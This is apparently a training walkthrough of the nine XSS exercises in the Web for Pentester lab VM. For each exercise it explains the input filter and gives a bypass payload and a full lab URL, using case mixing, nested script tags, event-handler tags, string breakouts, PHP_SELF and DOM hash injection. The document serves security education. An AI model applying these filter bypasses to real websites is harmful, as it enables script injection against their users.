Link : Install and configure Web for Pentester VM
In web for pentester VM there are 9 XSS exercise or vulnerabilities. Which are as follows :
To start with the examples just click on example links and it will open the example page.
At the above screenshot we can see the example 1 page. Now lets start with examples.
Example 1 :
At the first example, there's no anty kind of filter mechanism. As we can see in the source code,
Note : To view the source code on browser press the Control + U button.
So the payload will be :
Payload :
<script>alert(1)</script>http://192.168.56.101/xss/example1.php?name=<script>alert(1)</script>
Example 2 :
In the example 2, there is a filter mechanism, which filters the <script> and </script> tags when we try previous payload on it.
To bypass it, we need to modify the word script lke this : ScRIpt or sCRipt or SCRIPt or ScripT. Now the payload will be,
Payload :
<sCrIpt>alert(1)</ScRipt>http://192.168.56.101/xss/example2.php?name=<sCrIpt>alert(1)</ScRipt>
Example 3 :
The Example 3 also use <script> tag filter like example2, but this time it will also filter the both uppercase and lowercase letters. To bypass it, we can abuse its filtering functionality by putting a <script> tag inside a script tag so it will filter the inside script tag. for example : <scr<script>ipt>, then after the filtration only <script> will be remaining.
Payload :
<scr<script>ipt>alert(1)</scri</script>pt>Exploit :
http://192.168.56.101/xss/example3.php?name=<scr<script>ipt>alert(1)</scri</script>pt>
Example 4 :
The example4 do not filter the the tag, instead if it detects the word script (both upper/lower cases) then it will show an error message. To bypass it we need to use html tags instead of script tags like <body onload="alert(1)">, <video src=_ onloadstart="alert(1)">, <b/ onmouseover="alert(1)">, <img src="x" onerror="alert(1)"> etc.
Payload :
<body onload="alert(1)">http://192.168.56.101/xss/example4.php?name=<body onload="alert(1)">
Example 5 :
The example5 filters the alert text, so we can bypass it putting prompt() in place of alert().
Payload :
<script>prompt(1)</script>http://192.168.56.101/xss/example5.php?name=<script>prompt(1)</script>
Example 6 :
In example6 the given data will be stored in variable $a inside javascript tag.
To bypass it we just need to provide our payload without <script> tag and exclude the column " by creating a variable var x = "
Payload :
";alert(1);x="http://192.168.56.101/xss/example6.php?name=";alert(1);x="
Example 7 :
The example7 is same as the example6, except that there is a single ' (column), so we need to replace the double column ( " ) with single coulmn ( ' ) of example6 payload.
Payload :
';alert(1);x='http://192.168.56.101/xss/example7.php?name=';alert(1);x='
Example 8 :
In the example8 the provided data is shown in the page, but it is encoded with htmlentities() function in php, which prevents to execute our payload as stored XSS.
But when we look at the source code of the page then it will use PHP_SELF variable in form to get the page path. So by putting the payload at url we can execute our code. But we also need "> to close the form method tag before the payload. And note that there is a / is also important at the end of the url part.
Payload :
/"><script>alert(1)</script>http://192.168.56.101/xss/example8.php/"><script>alert(1)</script>/"><body onload=alert(1)>
Example 9 :
The example9 is a DOM based XSS. It takes input from the url after the #, so we can put our payload after the #
Payload :
<script>alert(1)</script>http://192.168.56.101/xss/example9.php#<script>alert(1)</script>
Conclusion :
At above we can exploit all the XSS vulnerabilty in the Web for Pentester VM.
Also Checkout our other articles related to XSS.
Links :
What is Cross Site Scripting (XSS)
Reflected XSS
Stored XSS
DOM Based XSS
XSS Payloads Collection and Important Links